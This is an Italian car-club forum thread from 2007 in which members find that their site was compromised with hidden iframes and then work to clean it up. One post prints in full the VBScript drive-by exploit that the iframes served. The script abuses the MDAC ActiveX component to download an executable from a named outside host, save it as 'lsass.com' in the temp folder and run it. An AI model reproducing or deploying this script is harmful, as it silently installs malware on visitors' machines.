Astra Club Italia Forum - Opel Astra e tanto altro!

di **gaspy75** » 21/09/2007, 9:37

jeremj ha scritto:
Da dove??
Così lo sanno anche gli altri.

Dal pannello Opzioni del software antivirus.

di **jeremj** » 21/09/2007, 11:02

gaspy75 ha scritto:
jeremj ha scritto:
Da dove??
Così lo sanno anche gli altri.

Dal pannello Opzioni del software antivirus.

Allora su F-SECURE non ho trovato nulla, proverò stasera a vedere se c'è su ANTIVIR :cry:

di **Gianfy** » 21/09/2007, 20:39

gaspy75 ha scritto:
Togliendo l'opzione Heuristic

Scusate ma veramente, ho appena dovuto riformattare tutto proprio perchè l'opzione Heuristic non era attivata e ho beccato un virus.....
non credo proprio che andrò a rimuoverla.....
credo invece che ci potrebbe essere qualche problema dove il sito è ospitato.....

di **badnoise** » 24/09/2007, 10:36

tra l'altro anche google lo segnala come sito a rischio... provate a cercare astra h forum e guardate il risultato...

di **Roll** » 24/09/2007, 10:40

Confermo.... GOOGLE lo segnala come un sito pericoloso e non ti ci fa entrare.... invece se ci entro dal mio solito collegamento al forum ci entra tranquillamente.

di **GreyOwl** » 24/09/2007, 10:46

già, è vero!

- Mr. President la sicurezza dei soci è a rischio
- fate decollare gli F-18
- ma è colpa dell'euristica, un virus...
- una nuova cellula terroristica?! e si prepara ad attaccare con armi chimiche? andiamo a defcon 0, armate i missili e fate scorta di patatine

:mrgreen:

di **badnoise** » 24/09/2007, 10:59

non è che qualcuno ha postato qualche link a programmi o siti non sicuri?

di **jeremj** » 24/09/2007, 11:06

E' quello che ho sempre sostenuto l'euristica non c'entra, l'unica cosa che mi viene in mente quando c'è stato il problema delle foto allegate da ELENCIU se non sbaglio che su MSN si correva il rischio di beccare il virus.
Non è che per caso c'è qualche foto nel fotoalbum che fa andare in malore il sito?? :roll:

CONTROLLARE. :grazie

di **Karu** » 24/09/2007, 11:06

O cazzolina.... non so più che fare. Mo' chiedo al Provider :evil:

di **Tiamax** » 24/09/2007, 11:08

karu sicuramente aruba ti dirà che non è colpa loro ma degli script di php come sempre fanno per smazzarzi le palle loro internamente..

di **leomenca** » 24/09/2007, 16:35

IL PROBLEMA E' IL SEGUENTE:

Purtroppo sulla home del portale abbiamo qualche link non proprio angelico e pulito.

Come al solito diciamo: GRAZIE MICROSOFT!!!

Sono affetti dal problema gli utenti che utilizzano Windows XP SP2/ 2000

Il seguente exploit è dovuto ad un componente di windows dedicato alla gestione remota delle connessioni DB
"Microsoft Data Access Components" msadco.dll

Bollettino Microsoft:
http://www.microsoft.com/italy/technet/ ... 6-014.mspx

Infatti il browser tenta di scaricare dalla seguente fonte :
__http://usuarios.arnet.com.ar/alvarezluque/morgan.html__

al suddetto link il nostro pc tenta di eseguire questo codice:
**************************************
<SCRIPT LANGUAGE="VBS">
**************************************

Che tradotto in codice VBScript è:

**************************************
<script language="VBScript">
on error resume next

dl = "http://usuarios.arnet.com.ar/alvarezluque/flash7.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject("Microsoft.XMLHTTP","")
set S = df.createobject("Adodb.Stream","")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
' Get temp directory and create our destination name
fname1="lsass.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script></body></html><script>
**************************************

In breve,
il pc tenta di scaricare ed eseguire un file exe malevolo identificato dal mio antivirus come: VBS/Psyme

(http://us.mcafee.com/virusInfo/default. ... s_k=100749)

Se non eravate protetti da un antivirus aggiornato siete stati sicuramente infettati a meno che non abbiate effettuato gli aggiornamenti della sicurezza di Windows:

Il file infetto che sta, probabilmente, facendo bagordi sul vostro pc si sarà sicuramente riprodotto in molte cartelle ma potreste cmqe isolarne una copia dalla cartella dei file temporanei internet : il nome del file dovrebbe essere "lsass.com"

Fate una breve ricerca su internet per risolvere il problema e disinfettarvi.

Chi era protetto può star tranquillo.
Ciao a presto

Leomenca.

di **Karu** » 24/09/2007, 16:42

Ho rimosso un blocco a destra, dove c'erano dei links.

Provate e ditemi se lo dà ancora... altro non saprei.... Leomenca, per caso riesci in un qualche modo a dirmi da dove può arrivare, o meglio, da dove parte il tutto?

di **leomenca** » 24/09/2007, 16:58

Mi faccio un giro e ti fo sapere.... a presto...

di **Karu** » 24/09/2007, 17:03

Ok, erano delle stringhe nell'index.php che ora ho rimosso.

Tenetemi aggiornato se lo dà ancora. :thx

E grazie mille a Leomenca! :ok

di **leomenca** » 24/09/2007, 17:17

AHIA...

credo sia il vostro Web Server dove siete ospitati ad avere il problema...

Accendendo al portale infatti il codice HTML della pagina principale è anomalo.

Prima di tutto è inzeppato di TAG iframe nascosti (molto pericolosi e invisibili all'utente) che puntano al virus :
___http://usuarios.arnet.com.ar/EtcEtc____

Penso che sia dovuto al server poichè questi TAG si notano anche dopo il tag di chiusura pagina </HTML>

Credo dobbiate fare o far fare una bella scansione della macchina server...

Per chi nn possiede un antivirus e cmqe vuole navigare tranquillamente sul portale consiglio di fare come di seguito:

Per i possessori di internet Explorer:

Menu Strumenti

Opzioni Internet

Protezione

Selezionare "siti con restrizioni"

Click sul tasto siti

nella casella di testo inserire "http://usuarios.arnet.com.ar"

"Aggiungi" e po "OK"

Click su OK fino ad uscire

Ora non avrete più accesso a quel link malefico

di **gaspy75** » 24/09/2007, 17:30

Grazie Aruba grazie, grazie aruba graaaazieeeeeeeeee :evil:

Karu è all'opera. Work in progress...

di **Karu** » 24/09/2007, 17:31

Ho visto, c'erano quelle righe in tutte le pagine php della root del portale. Ora parrebbe pulito da quegli iframe.

Ci ospita Aruba... ho già segnalato la cosa.

Ora mi dà dei problemi ad accedere alla pagina di admin.php, proprio dopo che ho rimosso quelle stringhe maledette.... :evil:

Provate un po' e ditemi.... :thx

di **leomenca** » 24/09/2007, 17:42

Bel lavoro KARU

e grazie ARUBA per come manutiene i server :evil:

P.S.

fatevi tutti una bella scansione ANTIVIRUZZZ....

di **Karu** » 24/09/2007, 18:00

Grazie leo, ma è grazie a te.... :ok

In ogni caso... ora pare ok.... ma non posso più entrare nell'admin del portale

Non capisco dove sia il problema e se qualcosa è stato intaccato.

Leo sei programmatore? PHP lo conosci?

:thx

ancora

di **leomenca** » 24/09/2007, 18:18

Karu ha scritto:Grazie leo, ma è grazie a te....

In ogni caso... ora pare ok.... ma non posso più entrare nell'admin del portale Non capisco dove sia il problema e se qualcosa è stato intaccato.

Leo sei programmatore? PHP lo conosci?

ancora

Di nulla, è stato un piacere aiutare questo nostro miticcco club. :mrgreen:

Ora ,
mi stai dicendo di non riuscire più ad accedere alla parte Admin del portale giusto? (il CMS è XOOP 2.0? )

Dovresti darmi maggiori informazioni sul tipo di errore e nel caso ricordare cosa hai modificato nei file .php di gestione del portale

Probabilmente il Malware ha danneggiato il codice o in alternativa devi aver modificato qualcosina di troppo durante l'opera di bonifica :oops:

cerca almeno di darmi il nome della pagina che va in errore ed il codice errore...

attendo notizie...ma sto scappando dall'uff...

riprendiamo domani.... o stanotte magari :shock:

Ciao

Astra Club Italia Forum - Opel Astra e tanto altro!

• Fotoalbum • Portale

virus nel sito del club?

Chi c’è in linea